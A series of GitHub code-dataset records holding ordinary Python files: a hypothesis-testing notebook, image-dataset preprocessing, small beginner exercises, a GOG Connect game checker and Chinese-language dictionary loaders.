(\"there is a difference in evaluation scores between male and females\")\n# \n\n# We can plot the dependent variable with a historgram\n# \n\n# In[4]:\n\n\nax = sns.distplot(df['eval'],\n bins=20,\n kde=True,\n color='red',\n hist_kws={\"linewidth\": 15,'alpha':1})\nax.set(xlabel='Normal Distribution', ylabel='Frequency')\n## we can assume it is normal\n\n\n# We can use the Levene's Test in Python to check test significance\n# \n\n# In[6]:\n\n\nscipy.stats.levene(df[df['gender'] == 'female']['eval'],\n df[df['gender'] == 'male']['eval'], center='mean')\n\n# since the p-value is greater than 0.05 we can assume equality of variance\n\n\n# Use the ttest_ind from the scipy_stats library\n# \n\n# In[7]:\n\n\nscipy.stats.ttest_ind(df[df['gender'] == 'female']['eval'],\n df[df['gender'] == 'male']['eval'], equal_var = True)\n\n\n# **Conclusion:** Since the p-value is less than alpha value 0.05, we reject the null hypothesis as there is enough proof that there is a statistical difference in teaching evaluations based on gender\n# \n\n# ### ANOVA: Using the teachers' rating data set, does beauty score for instructors differ by age?\n# \n\n# First, we group the data into cateries as the one-way ANOVA can't work with continuous variable - using the example from the video, we will create a new column for this newly assigned group our categories will be teachers that are:\n# \n# * 40 years and younger\n# * between 40 and 57 years\n# * 57 years and older\n# \n\n# In[9]:\n\n\ndf.loc[(df['age'] <= 40), 'age_group'] = '40 years and younger'\ndf.loc[(df['age'] > 40)&(df['age'] < 57), 'age_group'] = 'between 40 and 57 years'\ndf.loc[(df['age'] >= 57), 'age_group'] = '57 years and older'\n\n\n# State the hypothesis\n# \n# * $H\\_0: µ\\_1 = µ\\_2 = µ\\_3$ (the three population means are equal)\n# * $H\\_1:$ At least one of the means differ\n# \n\n# Test for equality of variance\n# \n\n# In[10]:\n\n\nscipy.stats.levene(df[df['age_group'] == '40 years and younger']['beauty'],\n df[df['age_group'] == 'between 40 and 57 years']['beauty'], \n df[df['age_group'] == '57 years and older']['beauty'], \n center='mean')\n# since the p-value is less than 0.05, the variance are not equal, for the purposes of this exercise, we will move along\n\n\n# First, separate the three samples (one for each job category) into a variable each.\n# \n\n# In[12]:\n\n\nforty_lower = df[df['age_group'] == '40 years and younger']['beauty']\nforty_fiftyseven = df[df['age_group'] == 'between 40 and 57 years']['beauty']\nfiftyseven_older = df[df['age_group'] == '57 years and older']['beauty']\n\n\n# Now, run a one-way ANOVA.\n# \n\n# In[14]:\n\n\nf_statistic, p_value = scipy.stats.f_oneway(forty_lower, forty_fiftyseven, fiftyseven_older)\nprint(\"F_Statistic: {0}, P-Value: {1}\".format(f_statistic,p_value))\n\n\n# **Conclusion:** Since the p-value is less than 0.05, we will reject the null hypothesis as there is significant evidence that at least one of the means differ.\n# \n\n# ### ANOVA: Using the teachers' rating data set, does teaching evaluation score for instructors differ by age?\n# \n\n# Test for equality of variance\n# \n\n# In[15]:\n\n\nscipy.stats.levene(df[df['age_group'] == '40 years and younger']['eval'],\n df[df['age_group'] == 'between 40 and 57 years']['eval'], \n df[df['age_group'] == '57 years and older']['eval'], \n center='mean')\n\n\n# In[16]:\n\n\nforty_lower_eval = df[df['age_group'] == '40 years and younger']['eval']\nforty_fiftyseven_eval = df[df['age_group'] == 'between 40 and 57 years']['eval']\nfiftyseven_older_eval = df[df['age_group'] == '57 years and older']['eval']\n\n\n# In[17]:\n\n\nf_statistic, p_value = scipy.stats.f_oneway(forty_lower_eval, forty_fiftyseven_eval, fiftyseven_older_eval)\nprint(\"F_Statistic: {0}, P-Value: {1}\".format(f_statistic,p_value))\n\n\n# **Conclusion:** Since the p-value is greater than 0.05, we will fail to reject the null hypothesis as there is no significant evidence that at least one of the means differ.\n# \n\n# ### Chi-square: Using the teachers' rating data set, is there an association between tenure and gender?\n# \n\n# State the hypothesis:\n# \n# * $H\\_0:$ The proportion of teachers who are tenured is independent of gender\n# * $H\\_1:$ The proportion of teachers who are tenured is associated with gender\n# \n\n# Create a Cross-tab table\n# \n\n# In[18]:\n\n\ncont_table = pd.crosstab(df['tenure'], df['gender'])\ncont_table\n\n\n# Use the scipy.stats library and set correction equals False as that will be the same answer when done by hand, it returns: 𝜒2 value, p-value, degree of freedom, and expected values.\n# \n\n# In[25]:\n\n\nscipy.stats.chi2_contingency(cont_table, correction = True)\n\n\n# **Conclusion:** Since the p-value is greater than 0.05, we fail to reject the null hypothesis. As there is no sufficient evidence that teachers are tenured as a result of gender.\n# \n\n# ### Correlation: Using the teachers rating dataset, Is teaching evaluation score correlated with beauty score?\n# \n\n# State the hypothesis:\n# \n# * $H\\_0:$ Teaching evaluation score is not correlated with beauty score\n# * $H\\_1:$ Teaching evaluation score is correlated with beauty score\n# \n\n# Since they are both continuous variables we can use a pearson correlation test and draw a scatter plot\n# \n\n# In[26]:\n\n\nax = sns.scatterplot(x=\"beauty\", y=\"eval\", data=df)\n\n\n# In[27]:\n\n\nscipy.stats.pearsonr(df['beauty'], df['eval'])\n\n\n# **Conclusion:** Since the p-value (Sig. (2-tailed) < 0.05, we reject the Null hypothesis and conclude that there exists a relationship between beauty and teaching evaluation score.\n# \n\n# ## Practice Questions\n# \n\n# ### Question 1: Using the teachers rating data set, does tenure affect teaching evaluation scores?\n# \n# * Use α = 0.05\n# \n\n# In[49]:\n\n\n# null hypo: there is no difference\n\n\n# In[30]:\n\n\nsns.distplot(df['eval'], bins=20, kde=True)\n\n\n# In[33]:\n\n\nscipy.stats.levene(df[df['tenure'] == 'yes']['eval'], df[df['tenure'] == 'no']['eval'], center='mean')\n\n\n# In[35]:\n\n\n# p value > 0.05 fail to reject so variances are equal\n\nscipy.stats.ttest_ind(df[df['tenure'] == 'yes']['eval'], df[df['tenure'] == 'no']['eval'], equal_var=True)\n\n# p value < 0.05 reject so tenured affects eval\n\n\n# ### Question 2: Using the teachers rating data set, is there an association between age and tenure?\n# \n# * Discretize the age into three groups 40 years and youngers, between 40 and 57 years, 57 years and older (This has already been done for you above.)\n# * What is your conclusion at α = 0.01 and α = 0.05?\n# \n\n# In[36]:\n\n\n# null hypo: there is no association betwwen age and tenure\n# alternative hypo: there is association betwwen age and tenure\n\n\n# In[40]:\n\n\nct = pd.crosstab(df['tenure'],df['age_group'])\nct\n\n\n# In[42]:\n\n\n#categorical chi square test\n\nscipy.stats.chi2_contingency(ct,correction=True)\n\n\n# In[43]:\n\n\n# α = 0.01, p value > α fail to reject\n# α = 0.05, p value < α reject\n\n\n# ### Question 3: Test for equality of variance for beauty scores between tenured and non-tenured instructors\n# \n# * Use α = 0.05\n# \n\n# In[44]:\n\n\nscipy.stats.levene(df[df['tenure'] == 'yes']['beauty'], df[df['tenure'] == 'no']['beauty'], center='mean')\n\n\n# In[45]:\n\n\nprint('\\u03B1')\n\n\n# In[46]:\n\n\n# p value > α fail to reject variances are equal\n\n\n# ### Question 4: Using the teachers rating data set, is there an association between visible minorities and tenure?\n# \n# * Use α = 0.05\n# \n\n# In[50]:\n\n\n# null hypo : there is no association between visible minorities and tenure\n\n\n# In[54]:\n\n\nct = pd.crosstab(df['tenure'],df['minority'])\nct\n\n\n# In[56]:\n\n\n#categorical chi square test\n\nscipy.stats.chi2_contingency(ct,correction=True)\n\n\n# In[57]:\n\n\n# p > α fail to reject so variances are equal\n\n","repo_name":"aumitcaliskan/Probability_and_Statistics","sub_path":"04_Hypothesis_Testing.py","file_name":"04_Hypothesis_Testing.py","file_ext":"py","file_size_in_byte":10521,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"18631744198","text":"import zipfile\nimport io\nimport os\nimport pandas as pd\nimport numpy as np\nfrom keras.preprocessing.image import image_utils\nfrom datasets import Dataset\nfrom datasets import Features, ClassLabel, Array3D\nfrom transformers import ViTImageProcessor\nimport random\n\n\ndef load_data():\n if not os.path.exists('./clothing-dataset/images.csv'):\n zf = zipfile.ZipFile(io.BytesIO('clothing-dataset.zip'), \"r\")\n zf.extractall()\n\n df = pd.read_csv('./clothing-dataset/images.csv').set_index('image')\n return df\n\n\ndef label_data(df : pd.DataFrame):\n top_labels = pd.DataFrame(df.groupby('label').size().reset_index().sort_values(0,ascending = False)['label'])\n top_labels = top_labels[top_labels.label!='Not sure']\n top_labels = top_labels[top_labels.label!='Other']\n top_labels = top_labels[top_labels.label!='Top']\n top_labels = top_labels[top_labels.label!='Skip']\n top_labels = top_labels[top_labels.label!='Undershirt']\n\n top_labels_list = sorted(list(top_labels['label']))\n top_labels['label_num'] = top_labels['label'].apply(lambda x: top_labels_list.index(x))\n\n return top_labels, top_labels_list\n\n\ndef label_data_from_database(df : pd.DataFrame):\n top_labels = pd.DataFrame(df.groupby('Label').size().reset_index().sort_values(0,ascending = False)['Label'])\n top_labels = top_labels[top_labels.Label!='Not sure']\n top_labels = top_labels[top_labels.Label!='Other']\n top_labels = top_labels[top_labels.Label!='Top']\n top_labels = top_labels[top_labels.Label!='Skip']\n top_labels = top_labels[top_labels.Label!='Undershirt']\n \n top_labels_list = sorted(list(top_labels['Label']))\n top_labels['label_num'] = top_labels['Label'].apply(lambda x: top_labels_list.index(x))\n\n return top_labels, top_labels_list\n\n\ndef filter_data(df : pd.DataFrame, top_labels : pd.DataFrame):\n data_filtered = pd.merge(df.reset_index(), top_labels).set_index('image')\n data_filtered['label_str'] = data_filtered['label']\n data_filtered['label'] = data_filtered['label_num']\n\n return data_filtered\n\n\ndef load_images(data_filtered : pd.DataFrame):\n labeled_data = []\n for i, item in enumerate(os.listdir( './clothing-dataset/images' )):\n path = os.path.join('./clothing-dataset/images', item) \n img = image_utils.load_img(path, target_size=(32, 32))\n \n x = image_utils.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n images = np.vstack([x])[0].tolist()\n\n try:\n label = data_filtered.loc[item[:-4],'label']\n labeled_data.append({'img':images, 'label':label, 'index':item[:-4]})\n except:\n label = 'no_data'\n\n return labeled_data\n\n\ndef load_images_from_database(images_info, images_binaries):\n labeled_data = []\n df = images_info.load_as_df()\n for i, item in enumerate(df[\"Image\"].tolist()):\n try:\n img = image_utils.load_img(images_binaries.load_image(item+\".jpg\"), target_size=(32, 32))\n except:\n continue\n \n x = image_utils.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n images = np.vstack([x])[0].tolist()\n\n try:\n label = df.loc[df[\"Image\"] == item, 'Label']\n labeled_data.append({'img':images, 'label':label, 'index':item})\n except:\n label = 'no_data'\n\n return labeled_data\n\n\ndef split_data(data_filtered : pd.DataFrame, labeled_data : list):\n ind = data_filtered.index.tolist()\n random.shuffle(ind)\n\n n = len(data_filtered)\n p_train = 0.6\n p_val = 0.2\n n_train = int(p_train*n)\n n_val = int(p_val*n)\n train_ind = ind[:n_train]\n val_ind = ind[n_train:(n_train+n_val)]\n test_ind = ind[(n_train+n_val):]\n\n train_img = []\n val_img = []\n test_img = []\n train_label = []\n val_label = []\n test_label = []\n test_ids = []\n\n for img in labeled_data:\n if img['index'] in train_ind:\n train_img.append(img['img'])\n train_label.append(img['label'])\n elif img['index'] in val_ind:\n val_img.append(img['img'])\n val_label.append(img['label'])\n elif img['index'] in test_ind:\n test_img.append(img['img'])\n test_label.append(img['label'])\n test_ids.append(img['index'])\n\n return train_img, val_img, test_img, train_label, val_label, test_label, test_ids\n\n\ndef split_data_from_database(df : pd.DataFrame, labeled_data : list):\n imgs = df[\"Image\"].tolist()\n random.shuffle(imgs)\n\n n = len(df)\n p_train = 0.6\n p_val = 0.2\n n_train = int(p_train*n)\n n_val = int(p_val*n)\n train_ind = imgs[:n_train]\n val_ind = imgs[n_train:(n_train+n_val)]\n test_ind = imgs[(n_train+n_val):]\n\n train_img = []\n val_img = []\n test_img = []\n train_label = []\n val_label = []\n test_label = []\n test_ids = []\n\n for img in labeled_data:\n if img['index'] in train_ind:\n train_img.append(img['img'])\n train_label.append(img['label'])\n elif img['index'] in val_ind:\n val_img.append(img['img'])\n val_label.append(img['label'])\n elif img['index'] in test_ind:\n test_img.append(img['img'])\n test_label.append(img['label'])\n test_ids.append(img['index'])\n \n return train_img, val_img, test_img, train_label, val_label, test_label, test_ids\n\n\ndef preprocess_images(top_labels_list : list, train_img : list, val_img : list, test_img : list, train_label : list, val_label : list, test_label : list):\n train_ds = preprocess_images_list(top_labels_list, train_img, train_label)\n val_ds = preprocess_images_list(top_labels_list, val_img, val_label)\n test_ds = preprocess_images_list(top_labels_list, test_img, test_label)\n \n return train_ds, val_ds, test_ds\n\n\ndef preprocess_images_list(top_labels_list : list, list_img : list, list_label : list):\n ds = Dataset.from_dict({'img':list_img,'label':list_label})\n\n feature_extractor = ViTImageProcessor.from_pretrained('google/vit-base-patch16-224-in21k')\n\n def preprocess(ds):\n images = ds['img']\n\n images = [np.array(image, dtype=np.uint8) for image in images]\n images = [np.moveaxis(image, source=-1, destination=0) for image in images]\n\n inputs = feature_extractor(images=images)\n ds['pixel_values'] = inputs['pixel_values']\n\n return ds\n \n features = Features({\n 'label': ClassLabel(names = top_labels_list),\n 'img': Array3D(dtype=\"int64\", shape=(3,32,32)),\n 'pixel_values': Array3D(dtype=\"float32\", shape=(3, 224, 224)),\n })\n \n ds = ds.map(preprocess, batched=True, features=features)\n \n return ds\n\n\ndef main():\n df = load_data()\n print(df.head())\n top_labels, top_labels_list = label_data(df)\n print(top_labels)\n data_filtered = filter_data(df, top_labels)\n print(data_filtered.head())\n labeled_data = load_images(data_filtered)\n print(labeled_data[0])\n train_img, val_img, test_img, train_label, val_label, test_label, test_ids = split_data(data_filtered, labeled_data)\n print(len(train_img), len(val_img), len(test_img))\n train_ds, val_ds, test_ds = preprocess_images(top_labels_list, train_img, val_img, test_img, train_label, val_label, test_label)\n print(train_ds)\n print(val_ds)\n print(test_ds)\n\nif __name__ == \"__main__\":\n main()","repo_name":"BrunoSienkiewicz/Clothing_similarity","sub_path":"model/preprocess_data.py","file_name":"preprocess_data.py","file_ext":"py","file_size_in_byte":7386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"39491090908","text":"def leiaInt(x):\n valor = 0\n while True:\n n = str(input(x))\n if n.isnumeric():\n valor = int(n)\n return valor\n else:\n print('\\033[0;31mERRO. Tente Novamente.\\033[m')\nn = leiaInt('Digite um número: ')\nprint(f'Número digitado: {n}')","repo_name":"brenopremoli/curso_em_video","sub_path":"python/exercicios/ex104.py","file_name":"ex104.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"42214177827","text":"#通过Python 计算一元二次方程\n#二次方程的基本格式 ax**2 + bx + c = 0\n\nimport cmath\n\nprint(\"二次方程的基本格式 ax^2 + bx + c = 0\")\na = float(input('输入a:'))\nb = float(input(\"输入b:\"))\nc = float(input(\"输入c:\"))\n\ndlet = (b**2) - (4*a*c)\n\n#注意这里引入了复数的概念,通过cmath计算得到答案\nanw1 = (-b-cmath.sqrt(dlet))/(2*a)\nanw2 = (-b+cmath.sqrt(dlet))/(2*a) \nprint(\"结果为{} 和 {}\".format(anw1,anw2))\n","repo_name":"Ehco1996/PythonPractice","sub_path":"菜鸟练习题/练习实例/004.py","file_name":"004.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"zh","doc_type":"code","stars":47,"dataset":"github-code","pt":"94"} +{"seq_id":"72652710069","text":"#!/usr/bin/env python2\n# Script to check for new GOG Connect games\n#\n# Configure your system for sending emails first. I used:\n# https://www.howtoforge.com/tutorial/configure-postfix-to-use-gmail-as-a-mail-relay/\nimport requests\nimport browsercookie\nimport json\nimport smtplib\nfrom email.mime.text import MIMEText\n\n# Fill in your email here\nEMAIL = \"\"\n\nsession = requests.Session()\nsession.headers[\"User-Agent\"] = \"Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0\"\n\n# Load cookies from Firefox\nsession.cookies = browsercookie.firefox()\n# Uncomment for Chrome\n#session.cookies = browsercookie.chrome()\n\nuser_data = json.loads(session.get(\"https://www.gog.com/userData.json\").text)\n\n# Refresh Steam products\nrefresh_url = \"https://www.gog.com/api/v1/users/{}/gogLink/steam/synchronizeUserProfile\".format(\n user_data[\"userId\"]\n)\n\nsession.get(refresh_url)\n\nsteam_products_url = \"http://www.gog.com/api/v1/users/{}/gogLink/steam/exchangeableProducts\".format(\n user_data[\"userId\"]\n)\n\nsteam_products = json.loads(session.get(steam_products_url).text)\n\ngames_available = False\nfor key, value in steam_products[\"items\"].items():\n if value[\"status\"] == \"available\":\n games_available = True\n break\n\nif games_available:\n print(\"New games available!\")\n msg = MIMEText(\"Redeem them here:\\nhttps://gog.com/connect/\")\n msg[\"Subject\"] = \"New GOG Connect games available!\"\n msg[\"From\"] = EMAIL\n msg[\"To\"] = EMAIL\n s = smtplib.SMTP(\"localhost\")\n s.sendmail(EMAIL, [EMAIL], msg.as_string())\n s.quit()\nelse:\n print(\"No new games available\")\n","repo_name":"gistable/gistable","sub_path":"dockerized-gists/511888530967f4d3fabe882c4d00575a/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"94"} +{"seq_id":"38681473454","text":"import pathlib\nimport csv\nimport json\nimport re\nimport random\nfrom collections import UserDict\nimport math\nimport decimal\nfrom decimal import Decimal\nimport statistics\nrandom.seed()\n\nfields = {\n 'kAccountingNumeric': 'numeric',\n 'kBigFive': 'big_five',\n 'kCangjie': 'cangjie',\n 'kCantonese': 'cantonese',\n 'kCCCII': 'cccii',\n 'kCheungBauer': 'cheung_bauer',\n 'kCheungBauerIndex': 'cheung_bauer_index',\n 'kCihaiT': 'cihait',\n 'kCNS1986': 'cns1986',\n 'kCNS1992': 'cnd1992',\n 'kCompatibilityVariant': 'compatibility_variant',\n 'kCowles': 'cowles',\n 'kDaeJaweon': 'dae_jaweon',\n 'kDefinition': 'definition',\n 'kEACC': 'eacc',\n 'kFenn': 'fenn',\n 'kFennIndex': 'fenn_index',\n 'kFourCornerCode': 'four_corner',\n 'kFrequency': 'frequency',\n 'kGB0': 'gb0',\n 'kGB1': 'gb1',\n 'kGB3': 'gb3',\n 'kGB5': 'gb5',\n 'kGB7': 'gb7',\n 'kGB8': 'gb8',\n 'kGradeLevel': 'grade_level',\n 'kGSR': 'gsr',\n 'kHangul': 'hangul',\n 'kHanYu': 'hanyu',\n 'kHanyuPinlu': 'hanyu_pinlu',\n 'kHanyuPinyin': 'hanyu_pinyin',\n 'kHDZRadBreak': 'hdz_rad_break',\n 'kHKGlyph': 'hk_glyph',\n 'kHKSCS': 'hkscs',\n 'kIBMJapan': 'ibm_japan',\n 'kIICore': 'iicore',\n 'kJapaneseKun': 'japanese_kun',\n 'kJapaneseOn': 'japanese_on',\n 'kJis0': 'jis0',\n 'kJis1': 'jis1',\n 'kJIS0213': 'jis2013',\n 'kKangXi': 'kangxi',\n 'kKarlgren': 'karlgren',\n 'kKorean': 'korean',\n 'kKPS0': 'kps0',\n 'kKPS1': 'kps1',\n 'kKSC0': 'ksc0',\n 'kKSC1': 'ksc1',\n 'kLau': 'lau',\n 'kMainlandTelegraph': 'mainland_telegraph',\n 'kMandarin': 'mandarin',\n 'kMatthews': 'matthews',\n 'kMeyerWempe': 'meyer_wempe',\n 'kMorohashi': 'morohashi',\n 'kNelson': 'nelson',\n 'kOtherNumeric': 'numeric',\n 'kPhonetic': 'phonetic',\n 'kPrimaryNumeric': 'numeric',\n 'kRSAdobe_Japan1_6': 'rs_adobe',\n 'kRSJapanese': 'rs_japanese',\n 'kRSKangXi': 'rs_kangxi',\n 'kRSKanWa': 'rs_kanwa',\n 'kRSKorean': 'rs_korean',\n 'kRSUnicode': 'rs_unicode',\n 'kSBGY': 'sbgy',\n 'kSemanticVariant': 'semantic_variant',\n 'kSimplifiedVariant': 'simplified_variant',\n 'kSpecializedSemanticVariant': 'specialized_semantic',\n 'kTaiwanTelegraph': 'taiwan_telegraph',\n 'kTang': 'tang',\n 'kTotalStrokes': 'total_strokes',\n 'kTraditionalVariant': 'traditional_variant',\n 'kVietnamese': 'vietnamese',\n 'kXerox': 'xerox',\n 'kXHC1983': 'xhc1983',\n 'kZVariant': 'z_variant'\n}\n\ndef load_unihan():\n unihan = dict()\n unihan_folder = pathlib.Path('data/unihan')\n for child in unihan_folder.iterdir():\n with child.open('r', encoding='utf-8', newline='') as csvfile:\n csvreader = csv.reader(csvfile, delimiter='\\t')\n for row in csvreader:\n if len(row) <= 0:\n pass\n elif row[0][0] == '#':\n pass\n elif row[0][0:2] == 'U+':\n char = chr(int(row[0][2:], 16))\n if char not in unihan:\n unihan[char] = {}\n\n field = row[1]\n value = row[2]\n\n if field in fields:\n unihan[char][fields[field]] = value\n\n return unihan\n\ndef load_cedict():\n entry = re.compile(r\"^(?P\\w+)\\s{1}(?P\\w+)\\s{1}\\[(?P.+)\\]\\s{1}/(?P.+)\")\n\n cedict = dict()\n cedict_file = pathlib.Path('data/cedict_1_0_ts_utf-8_mdbg.txt')\n with cedict_file.open('r', encoding='utf-8') as dictreader:\n count = 0\n for line in dictreader:\n if line[0] == '#':\n pass\n else:\n match = entry.match(line)\n if match is not None:\n simplified = match.group('simplified')\n if simplified not in cedict:\n cedict[simplified] = dict()\n cedict[simplified]['simplified'] = match.group('simplified')\n cedict[simplified]['traditional'] = match.group('traditional')\n cedict[simplified]['pinyin'] = match.group('pinyin').lower()\n cedict[simplified]['definitions'] = match.group('definitions')[0:-1].split('/')\n\n cedictchars = list()\n for word in cedict:\n chars = tuple(word)\n for char in chars:\n if char not in cedictchars:\n cedictchars.append(char)\n return cedict, cedictchars\n\ndef load_hsk():\n hsk = dict()\n hskwords = dict()\n hsk['word'] = hskwords\n hsk_file = pathlib.Path('data/hsk_words.csv')\n with hsk_file.open('r', encoding='utf-8', newline='') as csvfile:\n csvreader = csv.reader(csvfile, delimiter='\\t')\n for row in csvreader:\n if len(row) <= 0:\n pass\n elif row[0][0] == '#':\n pass\n else:\n level, simp, trad, pinyin_num, pinyin_mark, definition = tuple(row)\n if simp not in hskwords:\n hskwords[simp] = {\n 'level': level,\n 'simplified': simp,\n 'traditional': trad,\n 'pinyin': pinyin_num,\n 'pinyin_num': pinyin_num,\n 'pinyin_mark': pinyin_mark,\n 'definition': definition\n }\n\n hskchars = dict()\n hsk['char'] = hskchars\n for word in hskwords:\n chars = tuple(word)\n for char in chars:\n if char not in hskchars:\n hskchars[char] = {\n 'level': hskwords[word]['level']\n }\n\n return hsk\n\ndef load_subtlex():\n subtlex = dict()\n subtlex_folder = pathlib.Path('data/subtlex-ch')\n for child in subtlex_folder.iterdir():\n if 'csv' not in child.suffix:\n continue\n with child.open('r', encoding='utf-8', newline='') as csvfile:\n corpus_type = None\n if 'CHR' in child.stem:\n corpus_type = 'char'\n elif 'WF' in child.stem:\n corpus_type = 'word'\n else:\n raise ValueError('Incompatible or unknown SUBTLEX-CH corpus type')\n\n corpus = dict()\n subtlex[corpus_type] = corpus\n csvreader = csv.reader(csvfile, delimiter='\\t')\n\n token_string = next(csvreader)[0]\n tokens = int(''.join([x for x in token_string if x.isdigit()]))\n corpus['tokens'] = tokens\n\n context_string = next(csvreader)[0]\n contexts = int(''.join([str(x) for x in context_string if x.isdigit()]))\n corpus['contexts'] = contexts\n # Skip headers\n next(csvreader)\n\n # Process rows\n for row in csvreader:\n token, count, tpm, log_count, cd, cd_percent, log_cd = tuple(row)\n\n corpus[token] = {\n 'token': token,\n 'count': count,\n 'tpm': tpm,\n 'log_count':log_count,\n 'contexts': cd,\n 'contexts_percent': cd_percent,\n 'log_contexts': log_cd\n }\n\n return subtlex\n\ndef load_radicals():\n radical_dict = {\n 1: '一', 2: '丨', 3: '丶', 4: '丿', 5: '乙', 6: '亅', 7: '二', 8: '亠', 9: '人', 10: '儿',\n 11: '入', 12: '八', 13: '冂', 14: '冖', 15: '冫', 16: '几', 17: '凵', 18: '刀', 19: '力', 20: '勹',\n 21: '匕', 22: '匚', 23: '匸', 24: '十', 25: '卜', 26: '卩', 27: '厂', 28: '厶', 29: '又', 30: '口',\n 31: '囗', 32: '土', 33: '士', 34: '夂', 35: '夊', 36: '夕', 37: '大', 38: '女', 39: '子', 40: '宀',\n 41: '寸', 42: '小', 43: '尢', 44: '尸', 45: '屮', 46: '山', 47: '川', 48: '工', 49: '己', 50: '巾',\n 51: '干', 52: '幺', 53: '广', 54: '廴', 55: '廾', 56: '弋', 57: '弓', 58: '彐', 59: '彡', 60: '彳',\n 61: '心', 62: '戈', 63: '戶', 64: '手', 65: '支', 66: '攴', 67: '文', 68: '斗', 69: '斤', 70: '方',\n 71: '无', 72: '日', 73: '曰', 74: '月', 75: '木', 76: '欠', 77: '止', 78: '歹', 79: '殳', 80: '毋',\n 81: '比', 82: '毛', 83: '氏', 84: '气', 85: '水', 86: '火', 87: '爪', 88: '父', 89: '爻', 90: '爿',\n 91: '片', 92: '牙', 93: '牛', 94: '犬', 95: '玄', 96: '玉', 97: '瓜', 98: '瓦', 99: '甘', 100: '生',\n 101: '用', 102: '田', 103: '疋', 104: '疒', 105: '癶', 106: '白', 107: '皮', 108: '皿', 109: '目', 110: '矛',\n 111: '矢', 112: '石', 113: '示', 114: '禸', 115: '禾', 116: '穴', 117: '立', 118: '竹', 119: '米', 120: '纟',\n 121: '缶', 122: '网', 123: '羊', 124: '羽', 125: '老', 126: '而', 127: '耒', 128: '耳', 129: '聿', 130: '肉',\n 131: '臣', 132: '自', 133: '至', 134: '臼', 135: '舌', 136: '舛', 137: '舟', 138: '艮', 139: '色', 140: '艸',\n 141: '虍', 142: '虫', 143: '血', 144: '行', 145: '衣', 146: '襾', 147: '见', 148: '角', 149: '讠', 150: '谷',\n 151: '豆', 152: '豕', 153: '豸', 154: '贝', 155: '赤', 156: '走', 157: '足', 158: '身', 159: '车', 160: '辛',\n 161: '辰', 162: '辵', 163: '邑', 164: '酉', 165: '釆', 166: '里', 167: '金', 168: '长', 169: '门', 170: '阜',\n 171: '隶', 172: '隹', 173: '雨', 174: '青', 175: '非', 176: '面', 177: '革', 178: '韦', 179: '韭', 180: '音',\n 181: '页', 182: '风', 183: '飞', 184: '饣', 185: '首', 186: '香', 187: '马', 188: '骨', 189: '高', 190: '髟',\n 191: '鬥', 192: '鬯', 193: '鬲', 194: '鬼', 195: '鱼', 196: '鸟', 197: '鹵', 198: '鹿', 199: '麦', 200: '麻',\n 201: '黃', 202: '黍', 203: '黑', 204: '黹', 205: '黾', 206: '鼎', 207: '鼓', 208: '鼡', 209: '鼻', 210: '齐',\n 211: '齿', 212: '龙', 213: '龟', 214: '龠'\n }\n return radical_dict\n\nclass _Syllable():\n\n def __init__(self, pinyin, syllable):\n self.pinyin = pinyin\n self.syllable = syllable\n\n def __getattr__(self, key):\n if key in self.syllable:\n return self.syllable[key]\n\n def __getitem__(self, key):\n if key in self.syllable:\n return self.syllable[key]\n elif key is 'pinyin':\n return self.pinyin\n\n def __repr__(self):\n return str(self.syllable)\n\n # def count_vowels(self):\n # return len([1 for x in self.syllable['nucleus'] if x != [0,0,0]])\n\nclass _Syllables():\n\n def __init__(self, syllables):\n self.syllables = {key: _Syllable(key, value) for (key, value) in syllables.items()}\n\n def __getitem__(self, key):\n if key in self.syllables:\n return self.syllables[key]\n\n def __iter__(self):\n return iter(self.syllables)\n\n def _slot_distance(self, slot, s1, s2):\n # phoneme_slots = {\n # 1: 'onset',\n # 2: 'glide',\n # 3: 'nucleus',\n # 4: 'coda',\n # 5: 'tone'\n # }\n #\n # if type(slot) is int:\n # slot = phoneme_slots[slot]\n\n phoneme1 = self.syllables[s1][slot]\n phoneme2 = self.syllables[s2][slot]\n\n # if phoneme1 == [0.0, 0.0, 0.0] and phoneme2 == [0.0, 0.0, 0.0]:\n # return None\n\n return self._compute_distance(phoneme1, phoneme2)\n\n def onset_distance(self, s1, s2):\n on_distance = self._slot_distance('onset', s1, s2)\n gl_distance = self._slot_distance('glide', s1, s2)\n #return statistics.mean([on_distance, gl_distance])\n\n glide1 = self.syllables[s1]['syllable'][1]\n glide2 = self.syllables[s2]['syllable'][1]\n\n return statistics.mean([on_distance, gl_distance])\n # if glide1 != '' and glide2 != '':\n # return on_distance + (gl_distance/2)\n # elif glide1 == '' and glide2 == '':\n # return on_distance\n # else:\n # return on_distance + (gl_distance * 2)\n\n def rime_distance(self, s1, s2):\n nuc_distance = self._slot_distance('nucleus', s1, s2)\n cod_distance = self._slot_distance('coda', s1, s2)\n\n coda1 = self.syllables[s1]['syllable'][3]\n coda2 = self.syllables[s2]['syllable'][3]\n\n return statistics.mean([nuc_distance, cod_distance])\n # if coda1 != '' and coda2 != '':\n # #return statistics.mean([nuc_distance, cod_distance])\n # return nuc_distance + cod_distance\n # elif coda1 == '' and coda2 == '':\n # return nuc_distance + (cod_distance/3)\n # else:\n # #return statistics.mean([nuc_distance, (cod_distance)])\n # return nuc_distance + (cod_distance * 2)\n\n # on1 = self._get_slot('onset', s1)\n # on2 = self._get_slot('onset', s2)\n #\n # gl1 = self._get_slot('glide', s1)\n # gl2 = self._get_slot('glide', s2)\n #\n # ons = [on1, on2]\n # gls = [gl1, gl2]\n # syl1 = [on1, gl1]\n # syl2 = [on2, gl2]\n # all_slots = [on1, on2, gl1, gl2]\n #\n # if not self._any_slots(all_slots):\n # # RULE 1\n # return 0\n # elif self._all_slots(all_slots):\n # # RULE 2\n # return self._compound_onset(on1, gl1, on2, gl2)\n # elif self._all_slots(ons) and not self._any_slots(gls):\n # # RULE 3\n # return self._compute_distance(on1, on2)\n # elif\n\n\n\n # # elif self._all_slots(gls) and not self._any_slots(ons):\n # # # RULE 4\n # # return self._compute_distance(gl1, gl2)\n # elif self._all_slots(syl1) or self._all_slots(syl2):\n # if not self._any_slots(syl1) or not self._any_slots(syl2):\n # # RULE 5\n # 